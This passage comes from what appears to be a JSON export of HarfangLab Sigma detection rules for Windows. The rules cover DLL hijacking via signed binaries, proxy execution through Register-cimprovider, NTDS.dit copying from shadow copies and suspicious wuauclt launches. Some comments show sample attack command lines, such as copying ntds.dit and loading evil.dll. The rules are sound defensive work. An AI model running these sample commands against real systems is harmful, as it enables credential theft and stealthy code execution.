'gamepanel.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\d2d1.dll'\n - '\\d3d11.dll'\n - '\\dcomp.dll'\n - '\\dwmapi.dll'\n - '\\DWrite.dll'\n - '\\dxgi.dll'\n - '\\msdrm.dll'\n - '\\uianimation.dll'\n - '\\UIAutomationCore.DLL'\n - '\\UxTheme.dll'\n - '\\windowscodecs.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "06f328a3-6c34-4480-b44a-5ccfa923f899", "rule_name": "DLL Hijacking via gamepanel.exe", "rule_description": "Detects potential Windows DLL Hijacking via gamepanel.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "070c26de-9c37-4449-81eb-9d5f6a91c83b", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.593760Z", "creation_date": "2026-03-23T11:45:34.593764Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.593771Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_musnotificationux.yml", "content": "title: DLL Hijacking via musnotificationux.exe\nid: 070c26de-9c37-4449-81eb-9d5f6a91c83b\ndescription: |\n Detects potential Windows DLL Hijacking via musnotificationux.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'musnotificationux.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\Cabinet.dll'\n - '\\DMCmnUtils.dll'\n - '\\UpdatePolicy.dll'\n - '\\UPShared.dll'\n - '\\WINHTTP.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "070c26de-9c37-4449-81eb-9d5f6a91c83b", "rule_name": "DLL Hijacking via musnotificationux.exe", "rule_description": "Detects potential Windows DLL Hijacking via musnotificationux.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "072eb6a2-64bf-4b66-86f2-77e8e429ef63", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.586156Z", "creation_date": "2026-03-23T11:45:34.586174Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.586191Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_auditpol.yml", "content": "title: DLL Hijacking via auditpol.exe\nid: 072eb6a2-64bf-4b66-86f2-77e8e429ef63\ndescription: |\n Detects potential Windows DLL Hijacking via auditpol.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'auditpol.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\auditpolcore.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "072eb6a2-64bf-4b66-86f2-77e8e429ef63", "rule_name": "DLL Hijacking via auditpol.exe", "rule_description": "Detects potential Windows DLL Hijacking via auditpol.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "073992cd-3d71-4560-89eb-235eb6cfdf65", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.086864Z", "creation_date": "2026-03-23T11:45:34.086867Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.086881Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/", "https://twitter.com/PhilipTsukerman/status/992021361106268161", "https://attack.mitre.org/techniques/T1218/" ], "name": "t1218_register_cimprovider.yml", "content": "title: Suspicious Proxy Execution via Register-cimprovider.exe\nid: 073992cd-3d71-4560-89eb-235eb6cfdf65\ndescription: |\n Detects the use of Register-cimprovider.exe which is used to register new WMI providers to proxy execution of malicious code.\n This binary, which is digitally signed by Microsoft, can be used to execute malicious DLLs.\n Attackers may abused it to bypass security restrictions.\n It is recommended to investigate the parent process for suspicious activities as well as to look for subsequent malicious actions stemming from the Register-CimProvider process.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/\n - https://twitter.com/PhilipTsukerman/status/992021361106268161\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/03/01\nmodified: 2025/06/26\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.RegisterCimProvider\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\Register-cimprovider.exe'\n - OriginalFileName: 'Register-CimProvider2.exe'\n\n selection_command:\n # C:\\Windows\\SysWow64\\Register-CimProvider.exe -Path C:\\AtomicRedTeam\\atomics\\T1218\\src\\Win32\\T1218-2.dll\n # Register-cimprovider -path \"C:\\folder\\evil.dll\"\n CommandLine|contains|all:\n - ' -path '\n - '.dll'\n\n exclusion_programfiles:\n CommandLine|contains:\n - ' -Path ?:\\Program Files\\'\n - ' -Path ?:\\Program Files (x86)\\'\n\n # https://learn.microsoft.com/fr-fr/troubleshoot/mem/configmgr/endpoint-protection/configmgr-console-shows-out-of-date-values\n exclusion_protectionmanagement:\n CommandLine|contains|all:\n - '-ProviderName ProtectionManagement -Namespace root\\Microsoft\\protectionmanagement -Path'\n - '\\ProtectionManagement.dll'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "073992cd-3d71-4560-89eb-235eb6cfdf65", "rule_name": "Suspicious Proxy Execution via Register-cimprovider.exe", "rule_description": "Detects the use of Register-cimprovider.exe which is used to register new WMI providers to proxy execution of malicious code.\nThis binary, which is digitally signed by Microsoft, can be used to execute malicious DLLs.\nAttackers may abused it to bypass security restrictions.\nIt is recommended to investigate the parent process for suspicious activities as well as to look for subsequent malicious actions stemming from the Register-CimProvider process.\n", "rule_creation_date": "2022-03-01", "rule_modified_date": "2025-06-26", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1218" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "074c0895-1c28-4998-833c-644cd8fa5ff0", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.094771Z", "creation_date": "2026-03-23T11:45:34.094773Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.094777Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1003/003/", "https://attack.mitre.org/techniques/T1006/" ], "name": "t1003_003_powershell_ntds_shadow_copy.yml", "content": "title: NTDS Dumped from a Volume Shadow Copy via PowerShell\nid: 074c0895-1c28-4998-833c-644cd8fa5ff0\ndescription: |\n Detects a copy of the ntds.dit file from a Volume Shadow Copy with PowerShell in interactive mode.\n Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights.\n It is recommended to investigate the PowerShell command as well as other malicious commands executed on the domain controller to determine legitimacy.\nreferences:\n - https://attack.mitre.org/techniques/T1003/003/\n - https://attack.mitre.org/techniques/T1006/\ndate: 2022/05/10\nmodified: 2025/09/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.003\n - attack.t1078\n - attack.defense_evasion\n - attack.t1006\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n # copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\NTDS.dit C:\\shadowcopy\n PowershellCommand|contains|all:\n - 'copy '\n - 'GLOBALROOT'\n - 'HarddiskVolumeShadowCopy'\n - 'ntds.dit'\n condition: selection\nlevel: high\n# level: critical\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "074c0895-1c28-4998-833c-644cd8fa5ff0", "rule_name": "NTDS Dumped from a Volume Shadow Copy via PowerShell", "rule_description": "Detects a copy of the ntds.dit file from a Volume Shadow Copy with PowerShell in interactive mode.\nAdversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights.\nIt is recommended to investigate the PowerShell command as well as other malicious commands executed on the domain controller to determine legitimacy.\n", "rule_creation_date": "2022-05-10", "rule_modified_date": "2025-09-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.credential_access", "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1003.003", "attack.t1006", "attack.t1078" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "07c550a4-29ed-429b-8c3a-f6b59266b530", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.593517Z", "creation_date": "2026-03-23T11:45:34.593520Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.593528Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/xforcered/WFH", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_sppextcomobj.yml", "content": "title: DLL Hijacking via sppextcomobj.exe\nid: 07c550a4-29ed-429b-8c3a-f6b59266b530\ndescription: |\n Detects potential Windows DLL Hijacking via sppextcomobj.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'sppextcomobj.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\adsldpc.dll'\n - '\\CRYPTBASE.dll'\n - '\\DNSAPI.dll'\n - '\\rsaenh.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "07c550a4-29ed-429b-8c3a-f6b59266b530", "rule_name": "DLL Hijacking via sppextcomobj.exe", "rule_description": "Detects potential Windows DLL Hijacking via sppextcomobj.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "07ddc2b1-4842-43eb-92d7-df872335fcf9", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.098449Z", "creation_date": "2026-03-23T11:45:34.098451Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.098455Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_adobe_licensing.yml", "content": "title: DLL Hijacking via adobe_licensing_wf_helper.exe\nid: 07ddc2b1-4842-43eb-92d7-df872335fcf9\ndescription: |\n Detects potential Windows DLL Hijacking via Visual Studio adobe_licensing_wf_helper.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate signed executable to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/12/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'adobe_licensing_wf_helper.exe'\n ProcessSignature: 'Adobe Inc.'\n ImageLoaded|endswith: '\\libcef.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Common Files\\Adobe\\'\n - '?:\\Program Files (x86)\\Adobe\\'\n - '?:\\Program Files\\Adobe\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Common Files\\Adobe\\'\n - '?:\\Program Files (x86)\\Adobe\\'\n - '?:\\Program Files\\Adobe\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "07ddc2b1-4842-43eb-92d7-df872335fcf9", "rule_name": "DLL Hijacking via adobe_licensing_wf_helper.exe", "rule_description": "Detects potential Windows DLL Hijacking via Visual Studio adobe_licensing_wf_helper.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate signed executable to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-12-15", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "081076fd-302d-429b-88c3-9339633fee72", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.070904Z", "creation_date": "2026-03-23T11:45:34.070906Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.070910Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://posts.specterops.io/a-deep-dive-into-cobalt-strike-malleable-c2-6660e33b0e0b", "https://redcanary.com/blog/blackbyte-ransomware/", "https://attack.mitre.org/techniques/T1055/", "https://attack.mitre.org/software/S0154/" ], "name": "t1055_suspicious_process_wuauclt.yml", "content": "title: Suspicious wuauclt.exe Execution\nid: 081076fd-302d-429b-88c3-9339633fee72\ndescription: |\n Detects the execution of legitimate Windows Update Client (wuauclt.exe) Windows binary in a suspicious context.\n This can be the result of Cobalt Strike's exploitation via the spawnto setting to launch temporary jobs through this legitimate binary.\n It is recommended to analyze the newly created process and its parents for suspicious behavior or content.\nreferences:\n - https://posts.specterops.io/a-deep-dive-into-cobalt-strike-malleable-c2-6660e33b0e0b\n - https://redcanary.com/blog/blackbyte-ransomware/\n - https://attack.mitre.org/techniques/T1055/\n - https://attack.mitre.org/software/S0154/\ndate: 2022/01/25\nmodified: 2025/02/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - attack.s0154\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\wuauclt.exe'\n - OriginalFileName: 'wuauclt.exe'\n\n selection_existing_parent:\n ParentImage|contains: '\\'\n\n filter_parameters:\n # Command-line with no parameters\n CommandLine|contains: ' '\n\n filter_parentcommandline:\n ParentCommandLine:\n - '?:\\Windows\\System32\\mousocoreworker.exe -Embedding'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s wuauserv'\n - '?:\\Windows\\system32\\svchost.exe -k wuausvcs'\n - '?:\\Windows\\system32\\svchost.exe -k bitfsvcs'\n\n exclusion_explorer:\n ParentImage: '?:\\Windows\\explorer.exe'\n GrandparentImage:\n - '?:\\Windows\\System32\\userinit.exe'\n - '?:\\Windows\\System32\\winlogon.exe'\n\n exclusion_command:\n ParentImage:\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n GrandparentImage:\n - '?:\\Windows\\System32\\userinit.exe'\n - '?:\\Windows\\explorer.exe'\n\n exclusion_sihost1:\n ParentImage: '?:\\Windows\\System32\\sihost.exe'\n GrandparentCommandLine:\n - '?:\\windows\\System32\\svchost.exe -k netsvcs'\n - '?:\\windows\\System32\\svchost.exe -k netsvcs -p'\n - '?:\\windows\\System32\\svchost.exe -k netsvcs -s UserManager'\n - '?:\\windows\\System32\\svchost.exe -k netsvcs -p -s UserManager'\n\n exclusion_sihost2:\n Ancestors|contains: '?:\\Windows\\System32\\cmd.exe|?:\\Windows\\System32\\sihost.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "081076fd-302d-429b-88c3-9339633fee72", "rule_name": "Suspicious wuauclt.exe Execution", "rule_description": "Detects the execution of legitimate Windows Update Client (wuauclt.exe) Windows binary in a suspicious context.\nThis can be the result of Cobalt Strike's exploitation via the spawnto setting to launch temporary jobs through this legitimate binary.\nIt is recommended to analyze the newly created process and its parents for suspicious behavior or content.\n", "rule_creation_date": "2022-01-25", "rule_modified_date": "2025-02-14", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1055" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "08393432-4fef-4e8b-aa5e-fc13131e09c3", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, 